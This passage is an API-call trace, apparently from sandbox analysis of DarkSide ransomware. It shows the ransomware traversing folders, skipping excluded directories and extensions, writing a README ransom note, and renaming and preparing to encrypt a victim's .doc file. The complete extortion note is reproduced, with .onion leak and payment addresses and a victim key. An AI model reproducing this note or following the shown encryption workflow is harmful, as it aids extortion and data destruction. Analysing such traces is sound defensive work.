_Str2="z7yV5TDsi7l") returned -7 [0149.608] wcslen (_String="system volume information") returned 0x19 [0149.608] _wcsicmp (_Str1="tor browser", _Str2="z7yV5TDsi7l") returned -6 [0149.608] wcslen (_String="tor browser") returned 0xb [0149.608] _wcsicmp (_Str1="windows.old", _Str2="z7yV5TDsi7l") returned -3 [0149.609] wcslen (_String="windows.old") returned 0xb [0149.609] _wcsicmp (_Str1="intel", _Str2="z7yV5TDsi7l") returned -17 [0149.609] wcslen (_String="intel") returned 0x5 [0149.609] _wcsicmp (_Str1="msocache", _Str2="z7yV5TDsi7l") returned -13 [0149.609] wcslen (_String="msocache") returned 0x8 [0149.609] _wcsicmp (_Str1="perflogs", _Str2="z7yV5TDsi7l") returned -10 [0149.609] wcslen (_String="perflogs") returned 0x8 [0149.609] _wcsicmp (_Str1="x64dbg", _Str2="z7yV5TDsi7l") returned -2 [0149.609] wcslen (_String="x64dbg") returned 0x6 [0149.609] _wcsicmp (_Str1="public", _Str2="z7yV5TDsi7l") returned -10 [0149.609] wcslen (_String="public") returned 0x6 [0149.609] _wcsicmp (_Str1="all users", _Str2="z7yV5TDsi7l") returned -25 [0149.609] wcslen (_String="all users") returned 0x9 [0149.609] _wcsicmp (_Str1="default", _Str2="z7yV5TDsi7l") returned -22 [0149.609] wcslen (_String="default") returned 0x7 [0149.609] wcscpy (in: _Dest=0x44e0080, _Source="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\oHjAL\\*" | out: _Dest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\oHjAL\\*") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\oHjAL\\*" [0149.609] wcslen (_String="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\oHjAL\\*") returned 0x33 [0149.609] wcscpy (in: _Dest=0x44e00e4, _Source="z7yV5TDsi7l" | out: _Dest="z7yV5TDsi7l") returned="z7yV5TDsi7l" [0149.609] RtlAllocateHeap (HeapHandle=0x4c0000, Flags=0x0, Size=0x10000) returned 0x4500090 [0149.609] RtlAllocateHeap (HeapHandle=0x4c0000, Flags=0x0, Size=0x10000) returned 0x4510098 [0149.609] wcscpy (in: _Dest=0x4500090, _Source="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\oHjAL\\z7yV5TDsi7l" | out: _Dest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\oHjAL\\z7yV5TDsi7l") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\oHjAL\\z7yV5TDsi7l" [0149.610] GetNamedSecurityInfoW () returned 0x0 [0149.610] SetEntriesInAclW () returned 0x0 [0149.610] SetNamedSecurityInfoW () returned 0x0 [0149.612] RtlFreeHeap (HeapHandle=0x4c0000, Flags=0x0, BaseAddress=0x2d57838) returned 1 [0149.612] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x3fe5bc | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 0x25 [0149.612] SetCurrentDirectoryW (lpPathName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\oHjAL\\z7yV5TDsi7l" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\ohjal\\z7yv5tdsi7l")) returned 1 [0149.612] strlen (_Str="----------- [ Welcome to DarkSide ] -------------> \r\n \r\n What happend? \r\n ---------------------------------------------- \r\n Your computers and servers are encrypted, backups are deleted. We use strong encryption algorithms, so you cannot decrypt your data. \r\n But you can restore everything by purchasing a special program from us - universal decryptor. This program will restore all your network. \r\n Follow our instructions below and you will recover all your data. \r\n \r\n Data Leak \r\n ---------------------------------------------- \r\n Dear Isolved, pay close attention to this message because it is very important. When penetrating your network, there was a global data leak from your servers. More 350Gb of DATA. Except that your network was fully encrypted. \r\n We have all the most important data from all your servers: Bases, E-mails, Accounting, Finance. If you do not get in touch within 72 hours, information about this incident will be posted on our blog, which is monitored by leading media in the U.S. and the world. \r\n \r\n Blog URL \r\n ---------------------------------------------- \r\n http://darksidedxcftmqa.onion/isolved/OLVrV9bQny0XcUSkk8y6cvFWox_2cRFUiz95xG-hYGKETYuH1rlnl2d5exhQ0jHu \r\n \r\n What guarantees? \r\n ---------------------------------------------- \r\n We value our reputation. If we do not do our work and liabilities, nobody will pay us. This is not in our interests. \r\n All our decryption software is perfectly tested and will decrypt your data. We will also provide support in case of problems. \r\n We guarantee to decrypt one file for free. Go to the site and contact us. \r\n \r\n How to get access on website? \r\n ---------------------------------------------- \r\n Using a TOR browser: \r\n 1) Download and install TOR browser from this site: https://torproject.org/ \r\n 2) Open our website: http://darksidfqzcuhtk2.onion/AZHT20L23HCABE7V5FLPMR50Y0LPCNWKLICOH3MP156YR8DTFJGUE935ZG0QYCT6 \r\n \r\n When you open our website, put the following data in the input form: \r\n Key: \r\n \r\n MDwY2fJ0wMOMksG1GCvkBclFQNBOoNOtoKM1UfDyDwuobpBZwC5VSc9Y3cd130WLEVnipGp6jBFSvhWyVQsa0J0ICcDu9ihtUQ5yYCtSPNWu0XNtNwXchonPQ0iMpRO0leoAYPOeLNbBNkz7xlWPAOBMSBKpVQn1if08n0xBOpY7xC8J9BFmbbkZutVMbLqVqGzF8Q31iGOIDpONYRDC6KQ1fZMZhHIiGXStZG8NtnZYvQQ94XKRhCuhWNfNh1SmyM0YPNMVAnslDpZLmveZmB1vNxinwAlMJj67lVkjwXQRdcRiemxRpX7gIx6zbuvkqtdYIBo1q3neaVNLyLxogP8b50tKxc0Uok1lxDfTsZ61wmNhbJiyh1FXvjgZGrvEuR2SGm5to0K6fIA8GIA8Viu2AhxUOafNcYSKXckS5hq0zYOXnITkTJFvStKKSOLzp39sYyPYmDkyIPPQUTGsoqCIti0Sb2BQFTGkQQeqvnhdTJZfzVKGobFXx0b2aWi1yYavjfLdOdVzVQJIVyeOYe610BOT4L4fRpO38eiAcwKuS1eRwskD2jP \r\n \r\n !!! DANGER !!! \r\n DO NOT MODIFY or try to RECOVER any files yourself. We WILL NOT be able to RESTORE them. \r\n !!! DANGER !!!") returned 0xa8f [0149.612] CreateFileW (lpFileName="README.c06622a1.TXT" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\ohjal\\z7yv5tdsi7l\\readme.c06622a1.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1c [0149.613] WriteFile (in: hFile=0x1c, lpBuffer=0x514f30*, nNumberOfBytesToWrite=0xa8f, lpNumberOfBytesWritten=0x3fe58c, lpOverlapped=0x0 | out: lpBuffer=0x514f30*, lpNumberOfBytesWritten=0x3fe58c*=0xa8f, lpOverlapped=0x0) returned 1 [0149.614] CloseHandle (hObject=0x1c) returned 1 [0149.614] SetCurrentDirectoryW (lpPathName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop")) returned 1 [0149.614] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\oHjAL\\z7yV5TDsi7l" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\ohjal\\z7yv5tdsi7l")) returned 0x10 [0149.614] PathAddBackslashW (in: pszPath="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\oHjAL\\z7yV5TDsi7l" | out: pszPath="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\oHjAL\\z7yV5TDsi7l\\") returned="" [0149.614] wcslen (_String="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\oHjAL\\z7yV5TDsi7l\\") returned 0x3e [0149.614] FindFirstFileExW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\oHjAL\\z7yV5TDsi7l\\*", fInfoLevelId=0x0, lpFindFileData=0x3fe7ec, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3fe7ec) returned 0x2db87c0 [0149.615] FindNextFileW (in: hFindFile=0x2db87c0, lpFindFileData=0x3fe7ec | out: lpFindFileData=0x3fe7ec*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x7bbfcb80, ftCreationTime.dwHighDateTime=0x1d5e773, ftLastAccessTime.dwLowDateTime=0xd7ca4920, ftLastAccessTime.dwHighDateTime=0x1d6f256, ftLastWriteTime.dwLowDateTime=0xd7ca4920, ftLastWriteTime.dwHighDateTime=0x1d6f256, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0149.615] FindNextFileW (in: hFindFile=0x2db87c0, lpFindFileData=0x3fe7ec | out: lpFindFileData=0x3fe7ec*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6df89150, ftCreationTime.dwHighDateTime=0x1d5e7f8, ftLastAccessTime.dwLowDateTime=0xa3c7ac10, ftLastAccessTime.dwHighDateTime=0x1d5de8b, ftLastWriteTime.dwLowDateTime=0xa3c7ac10, ftLastWriteTime.dwHighDateTime=0x1d5de8b, nFileSizeHigh=0x0, nFileSizeLow=0x425d, dwReserved0=0x0, dwReserved1=0x0, cFileName="DN6GpPK5kNTZq1fYcf_.doc", cAlternateFileName="DN6GPP~1.DOC")) returned 1 [0149.615] _wcsicmp (_Str1="DN6GpPK5kNTZq1fYcf_.doc", _Str2="README.c06622a1.TXT") returned -14 [0149.615] wcsstr (_Str="DN6GpPK5kNTZq1fYcf_.doc", _SubStr="README") returned 0x0 [0149.615] _wcsicmp (_Str1="autorun.inf", _Str2="DN6GpPK5kNTZq1fYcf_.doc") returned -3 [0149.615] wcslen (_String="autorun.inf") returned 0xb [0149.615] _wcsicmp (_Str1="boot.ini", _Str2="DN6GpPK5kNTZq1fYcf_.doc") returned -2 [0149.615] wcslen (_String="boot.ini") returned 0x8 [0149.615] _wcsicmp (_Str1="bootfont.bin", _Str2="DN6GpPK5kNTZq1fYcf_.doc") returned -2 [0149.615] wcslen (_String="bootfont.bin") returned 0xc [0149.615] _wcsicmp (_Str1="bootsect.bak", _Str2="DN6GpPK5kNTZq1fYcf_.doc") returned -2 [0149.615] wcslen (_String="bootsect.bak") returned 0xc [0149.615] _wcsicmp (_Str1="desktop.ini", _Str2="DN6GpPK5kNTZq1fYcf_.doc") returned -9 [0149.615] wcslen (_String="desktop.ini") returned 0xb [0149.615] _wcsicmp (_Str1="iconcache.db", _Str2="DN6GpPK5kNTZq1fYcf_.doc") returned 5 [0149.615] wcslen (_String="iconcache.db") returned 0xc [0149.615] _wcsicmp (_Str1="ntldr", _Str2="DN6GpPK5kNTZq1fYcf_.doc") returned 10 [0149.615] wcslen (_String="ntldr") returned 0x5 [0149.615] _wcsicmp (_Str1="ntuser.dat", _Str2="DN6GpPK5kNTZq1fYcf_.doc") returned 10 [0149.615] wcslen (_String="ntuser.dat") returned 0xa [0149.616] _wcsicmp (_Str1="ntuser.dat.log", _Str2="DN6GpPK5kNTZq1fYcf_.doc") returned 10 [0149.616] wcslen (_String="ntuser.dat.log") returned 0xe [0149.616] _wcsicmp (_Str1="ntuser.ini", _Str2="DN6GpPK5kNTZq1fYcf_.doc") returned 10 [0149.616] wcslen (_String="ntuser.ini") returned 0xa [0149.616] _wcsicmp (_Str1="thumbs.db", _Str2="DN6GpPK5kNTZq1fYcf_.doc") returned 16 [0149.616] wcslen (_String="thumbs.db") returned 0x9 [0149.616] _wcsicmp (_Str1="386", _Str2="doc") returned -49 [0149.616] wcslen (_String="386") returned 0x3 [0149.616] _wcsicmp (_Str1="adv", _Str2="doc") returned -3 [0149.616] wcslen (_String="adv") returned 0x3 [0149.616] _wcsicmp (_Str1="ani", _Str2="doc") returned -3 [0149.616] wcslen (_String="ani") returned 0x3 [0149.616] _wcsicmp (_Str1="bat", _Str2="doc") returned -2 [0149.616] wcslen (_String="bat") returned 0x3 [0149.616] _wcsicmp (_Str1="bin", _Str2="doc") returned -2 [0149.616] wcslen (_String="bin") returned 0x3 [0149.616] _wcsicmp (_Str1="cab", _Str2="doc") returned -1 [0149.616] wcslen (_String="cab") returned 0x3 [0149.616] _wcsicmp (_Str1="cmd", _Str2="doc") returned -1 [0149.616] wcslen (_String="cmd") returned 0x3 [0149.616] _wcsicmp (_Str1="com", _Str2="doc") returned -1 [0149.616] wcslen (_String="com") returned 0x3 [0149.616] _wcsicmp (_Str1="cpl", _Str2="doc") returned -1 [0149.617] wcslen (_String="cpl") returned 0x3 [0149.617] _wcsicmp (_Str1="cur", _Str2="doc") returned -1 [0149.617] wcslen (_String="cur") returned 0x3 [0149.617] _wcsicmp (_Str1="deskthemepack", _Str2="doc") returned -10 [0149.617] wcslen (_String="deskthemepack") returned 0xd [0149.617] _wcsicmp (_Str1="diagcab", _Str2="doc") returned -6 [0149.617] wcslen (_String="diagcab") returned 0x7 [0149.617] _wcsicmp (_Str1="diagcfg", _Str2="doc") returned -6 [0149.617] wcslen (_String="diagcfg") returned 0x7 [0149.617] _wcsicmp (_Str1="diagpkg", _Str2="doc") returned -6 [0149.617] wcslen (_String="diagpkg") returned 0x7 [0149.617] _wcsicmp (_Str1="dll", _Str2="doc") returned -3 [0149.617] wcslen (_String="dll") returned 0x3 [0149.617] _wcsicmp (_Str1="drv", _Str2="doc") returned 3 [0149.617] wcslen (_String="drv") returned 0x3 [0149.617] _wcsicmp (_Str1="exe", _Str2="doc") returned 1 [0149.617] wcslen (_String="exe") returned 0x3 [0149.617] _wcsicmp (_Str1="hlp", _Str2="doc") returned 4 [0149.617] wcslen (_String="hlp") returned 0x3 [0149.617] _wcsicmp (_Str1="icl", _Str2="doc") returned 5 [0149.617] wcslen (_String="icl") returned 0x3 [0149.617] _wcsicmp (_Str1="icns", _Str2="doc") returned 5 [0149.617] wcslen (_String="icns") returned 0x4 [0149.617] _wcsicmp (_Str1="ico", _Str2="doc") returned 5 [0149.617] wcslen (_String="ico") returned 0x3 [0149.617] _wcsicmp (_Str1="ics", _Str2="doc") returned 5 [0149.617] wcslen (_String="ics") returned 0x3 [0149.617] _wcsicmp (_Str1="idx", _Str2="doc") returned 5 [0149.618] wcslen (_String="idx") returned 0x3 [0149.618] _wcsicmp (_Str1="ldf", _Str2="doc") returned 8 [0149.618] wcslen (_String="ldf") returned 0x3 [0149.618] _wcsicmp (_Str1="lnk", _Str2="doc") returned 8 [0149.618] wcslen (_String="lnk") returned 0x3 [0149.618] _wcsicmp (_Str1="mod", _Str2="doc") returned 9 [0149.618] wcslen (_String="mod") returned 0x3 [0149.618] _wcsicmp (_Str1="mpa", _Str2="doc") returned 9 [0149.618] wcslen (_String="mpa") returned 0x3 [0149.618] _wcsicmp (_Str1="msc", _Str2="doc") returned 9 [0149.618] wcslen (_String="msc") returned 0x3 [0149.618] _wcsicmp (_Str1="msp", _Str2="doc") returned 9 [0149.618] wcslen (_String="msp") returned 0x3 [0149.618] _wcsicmp (_Str1="msstyles", _Str2="doc") returned 9 [0149.618] wcslen (_String="msstyles") returned 0x8 [0149.618] _wcsicmp (_Str1="msu", _Str2="doc") returned 9 [0149.618] wcslen (_String="msu") returned 0x3 [0149.618] _wcsicmp (_Str1="nls", _Str2="doc") returned 10 [0149.619] wcslen (_String="nls") returned 0x3 [0149.619] _wcsicmp (_Str1="nomedia", _Str2="doc") returned 10 [0149.619] wcslen (_String="nomedia") returned 0x7 [0149.619] _wcsicmp (_Str1="ocx", _Str2="doc") returned 11 [0149.619] wcslen (_String="ocx") returned 0x3 [0149.619] _wcsicmp (_Str1="prf", _Str2="doc") returned 12 [0149.619] wcslen (_String="prf") returned 0x3 [0149.619] _wcsicmp (_Str1="ps1", _Str2="doc") returned 12 [0149.619] wcslen (_String="ps1") returned 0x3 [0149.619] _wcsicmp (_Str1="rom", _Str2="doc") returned 14 [0149.619] wcslen (_String="rom") returned 0x3 [0149.619] _wcsicmp (_Str1="rtp", _Str2="doc") returned 14 [0149.619] wcslen (_String="rtp") returned 0x3 [0149.619] _wcsicmp (_Str1="scr", _Str2="doc") returned 15 [0149.619] wcslen (_String="scr") returned 0x3 [0149.619] _wcsicmp (_Str1="shs", _Str2="doc") returned 15 [0149.619] wcslen (_String="shs") returned 0x3 [0149.619] _wcsicmp (_Str1="spl", _Str2="doc") returned 15 [0149.619] wcslen (_String="spl") returned 0x3 [0149.619] _wcsicmp (_Str1="sys", _Str2="doc") returned 15 [0149.619] wcslen (_String="sys") returned 0x3 [0149.619] _wcsicmp (_Str1="theme", _Str2="doc") returned 16 [0149.619] wcslen (_String="theme") returned 0x5 [0149.619] _wcsicmp (_Str1="themepack", _Str2="doc") returned 16 [0149.619] wcslen (_String="themepack") returned 0x9 [0149.619] _wcsicmp (_Str1="wpx", _Str2="doc") returned 19 [0149.620] wcslen (_String="wpx") returned 0x3 [0149.620] _wcsicmp (_Str1="lock", _Str2="doc") returned 8 [0149.620] wcslen (_String="lock") returned 0x4 [0149.620] _wcsicmp (_Str1="key", _Str2="doc") returned 7 [0149.620] wcslen (_String="key") returned 0x3 [0149.620] _wcsicmp (_Str1="hta", _Str2="doc") returned 4 [0149.620] wcslen (_String="hta") returned 0x3 [0149.620] _wcsicmp (_Str1="msi", _Str2="doc") returned 9 [0149.620] wcslen (_String="msi") returned 0x3 [0149.620] _wcsicmp (_Str1="pdb", _Str2="doc") returned 12 [0149.620] wcslen (_String="pdb") returned 0x3 [0149.620] _wcsicmp (_Str1="sql", _Str2="doc") returned 15 [0149.620] wcslen (_String="sql") returned 0x3 [0149.620] _wcsicmp (_Str1="sqlite", _Str2="doc") returned 15 [0149.620] wcslen (_String="sqlite") returned 0x6 [0149.620] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\oHjAL\\z7yV5TDsi7l" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\ohjal\\z7yv5tdsi7l")) returned 0x10 [0149.620] RtlAllocateHeap (HeapHandle=0x4c0000, Flags=0x0, Size=0x10000) returned 0x45300a8 [0149.620] wcscpy (in: _Dest=0x45300a8, _Source="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\oHjAL\\z7yV5TDsi7l" | out: _Dest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\oHjAL\\z7yV5TDsi7l") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\oHjAL\\z7yV5TDsi7l" [0149.620] wcslen (_String="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\oHjAL\\z7yV5TDsi7l") returned 0x3d [0149.620] wcscpy (in: _Dest=0x4530124, _Source="DN6GpPK5kNTZq1fYcf_.doc" | out: _Dest="DN6GpPK5kNTZq1fYcf_.doc") returned="DN6GpPK5kNTZq1fYcf_.doc" [0149.621] SetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\oHjAL\\z7yV5TDsi7l\\DN6GpPK5kNTZq1fYcf_.doc", dwFileAttributes=0x80) returned 1 [0149.621] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\oHjAL\\z7yV5TDsi7l\\DN6GpPK5kNTZq1fYcf_.doc" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\ohjal\\z7yv5tdsi7l\\dn6gppk5kntzq1fycf_.doc"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x618 [0149.621] SetFilePointerEx (in: hFile=0x618, liDistanceToMove=0xffffff70, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0149.621] ReadFile (in: hFile=0x618, lpBuffer=0x3fe674, nNumberOfBytesToRead=0x90, lpNumberOfBytesRead=0x3fe704, lpOverlapped=0x0 | out: lpBuffer=0x3fe674*, lpNumberOfBytesRead=0x3fe704*=0x90, lpOverlapped=0x0) returned 1 [0149.622] RtlComputeCrc32 (PartialCrc=0xbeef, Buffer=0x3fe674, Length=0x80) returned 0x46a5c445 [0149.622] RtlComputeCrc32 (PartialCrc=0xc445, Buffer=0x3fe674, Length=0x80) returned 0x16f13b10 [0149.622] RtlComputeCrc32 (PartialCrc=0x3b10, Buffer=0x3fe674, Length=0x80) returned 0x22d91395 [0149.622] RtlComputeCrc32 (PartialCrc=0x1395, Buffer=0x3fe674, Length=0x80) returned 0x95aa9376 [0149.622] RtlComputeCrc32 (PartialCrc=0x9376, Buffer=0x3fe674, Length=0x80) returned 0xd96e95a6 [0149.622] CloseHandle (hObject=0x618) returned 1 [0149.622] RtlAllocateHeap (HeapHandle=0x4c0000, Flags=0x0, Size=0x10000) returned 0x45400b0 [0149.622] wcscpy (in: _Dest=0x45400b0, _Source="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\oHjAL\\z7yV5TDsi7l\\DN6GpPK5kNTZq1fYcf_.doc" | out: _Dest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\oHjAL\\z7yV5TDsi7l\\DN6GpPK5kNTZq1fYcf_.doc") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\oHjAL\\z7yV5TDsi7l\\DN6GpPK5kNTZq1fYcf_.doc" [0149.622] wcslen (_String="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\oHjAL\\z7yV5TDsi7l\\DN6GpPK5kNTZq1fYcf_.doc") returned 0x55 [0149.622] wcscpy (in: _Dest=0x454015a, _Source=".c06622a1" | out: _Dest=".c06622a1") returned=".c06622a1" [0149.622] MoveFileExW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\oHjAL\\z7yV5TDsi7l\\DN6GpPK5kNTZq1fYcf_.doc" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\ohjal\\z7yv5tdsi7l\\dn6gppk5kntzq1fycf_.doc"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\oHjAL\\z7yV5TDsi7l\\DN6GpPK5kNTZq1fYcf_.doc.c06622a1" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\ohjal\\z7yv5tdsi7l\\dn6gppk5kntzq1fycf_.doc.c06622a1"), dwFlags=0x8) returned 1 [0149.624] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\oHjAL\\z7yV5TDsi7l\\DN6GpPK5kNTZq1fYcf_.doc.c06622a1" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\ohjal\\z7yv5tdsi7l\\dn6gppk5kntzq1fycf_.doc.c06622a1"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x48000000, hTemplateFile=0x0) returned 0x618 [0149.625] CreateIoCompletionPort (FileHandle=0x618, ExistingCompletionPort=0x5e0, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x5e0 [0149.625] RtlAllocateHeap (HeapHandle=0x4c0000, Flags=0x0, Size=0x80104) returned 0x51b0020 [0149.631] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x4620d2a0 [0149.631] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0xfa31fbd [0149.631] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x7e7cc08f [0149.631] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x2159590b [0149.631] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x1b3a75a4 [0149.631] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x73eb75f4 [0149.631] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x32481427 [0149.632] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x2e36a872 [0149.635] RtlComputeCrc32 (PartialCrc=0xbeef, Buffer=0x51b0094, Length=0x80) returned 0xbd7cc152 [0149.635] RtlComputeCrc32 (PartialCrc=0xc152, Buffer=0x51b0094, Length=0x80) returned 0x96746e80 [0149.635] RtlComputeCrc32 (PartialCrc=0x6e80, Buffer=0x51b0094, Length=0x80) returned 0x8e63a9a6 [0149.635] RtlComputeCrc32 (PartialCrc=0xa9a6, Buffer=0x51b0094, Length=0x80) returned 0xf1de9e66 [0149.635] RtlComputeCrc32 (PartialCrc=0x9e66, Buffer=0x51b0094, Length=0x80) returned 0xb0d7bbd4 [0149.635] PostQueuedCompletionStatus (CompletionPort=0x5e0, dwNumberOfBytesTransferred=0x0, dwCompletionKey=0x0, lpOverlapped=0x51b0020) returned 1 [0149.635] RtlFreeHeap (HeapHandle=0x4c0000, Flags=0x0, BaseAddress=0x45300a8) returned 1 [0149.635] RtlFreeHeap (HeapHandle=0x4c0000, Flags=0x0, BaseAddress=0x45400b0) returned 1 [0149.635] FindNextFileW (in: hFindFile=0x2db87c0, lpFindFileData=0x3fe7ec | out: lpFindFileData=0x3fe7ec*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd7ca4920, ftCreationTime.dwHighDateTime=0x1d6f256, ftLastAccessTime.dwLowDateTime=0xd7ca4920, ftLastAccessTime.dwHighDateTime=0x1d6f256, ftLastWriteTime.dwLowDateTime=0xd7ca4920, ftLastWriteTime.dwHighDateTime=0x1d6f256, nFileSizeHigh=0x0, nFileSizeLow=0xa8f, dwReserved0=0x0, dwReserved1=0x0, cFileName="README.c06622a1.TXT", cAlternateFileName="README~1.TXT")) returned 1 [0149.635] _wcsicmp (_Str1="README.c06622a1.TXT", _Str2="README.c06622a1.TXT") returned 0 [0149.635] FindNextFileW (in: hFindFile=0x2db87c0, lpFindFileData=0x3fe7ec | out: lpFindFileData=0x3fe7ec*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0149.635] FindClose (in: hFindFile=0x2db87c0 | out: hFindFile=0x2db87c0) returned 1 [0149.635] _wcsicmp (_Str1="backup", _Str2="z7yV5TDsi7l") returned -24 [0149.635] wcslen (_String="backup") returned 0x6 [0149.635] RtlFreeHeap (HeapHandle=0x4c0000, Flags=0x0, BaseAddress=0x4500090) returned 1 [0149.636] RtlFreeHeap (HeapHandle=0x4c0000, Flags=0x0, BaseAddress=0x4510098) returned 1 [0149.636] FindNextFileW (in: hFindFile=0x2db8780, lpFindFileData=0x3fea6c | out: lpFindFileData=0x3fea6c*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0149.636] FindClose (in: hFindFile=0x2db8780 | out: hFindFile=0x2db8780) returned 1 [0149.636] _wcsicmp (_Str1="backup", _Str2="oHjAL") returned -13 [0149.636] wcslen (_String="backup") returned 0x6 [0149.636] RtlFreeHeap (HeapHandle=0x4c0000, Flags=0x0, BaseAddress=0x44d0078) returned 1 [0149.637] RtlFreeHeap (HeapHandle=0x4c0000, Flags=0x0, BaseAddress=0x44e0080) returned 1 [0149.638] FindNextFileW (in: hFindFile=0x2db8740, lpFindFileData=0x3fecec | out: lpFindFileData=0x3fecec*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x5a7a9f80, ftCreationTime.dwHighDateTime=0x1d2fad7, ftLastAccessTime.dwLowDateTime=0x8a4af3c0, ftLastAccessTime.dwHighDateTime=0x1d5e82a, ftLastWriteTime.dwLowDateTime=0x8a4af3c0, ftLastWriteTime.dwHighDateTime=0x1d5e82a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Outlook Files", cAlternateFileName="OUTLOO~1")) returned 1 [0149.638] _wcsicmp (_Str1="$recycle.bin", _Str2="Outlook Files") returned -75 [0149.638] wcslen (_String="$recycle.bin") returned 0xc [0149.638] _wcsicmp (_Str1="config.msi", _Str2="Outlook Files") returned -12 [0149.638] wcslen (_String="config.msi") returned 0xa [0149.638] _wcsicmp (_Str1="$windows.~bt", _Str2="Outlook Files") returned -75 [0149.638] wcslen (_String="$windows.~bt") returned 0xc [0149.638] _wcsicmp (_Str1="$windows.~ws", _Str2="Outlook Files") returned -75 [0149.638] wcslen (_String="$windows.~ws") returned 0xc [0149.638] _wcsicmp (_Str1="windows", _Str2="Outlook Files") returned 8 [0149.638] wcslen (_String="windows") returned 0x7 [0149.638] _wcsicmp (_Str1="appdata", _Str2="Outlook Files") returned -14 [0149.638] wcslen (_String="appdata") returned 0x7 [0149.638] _wcsicmp (_Str1="application data", _Str2="Outlook Files") 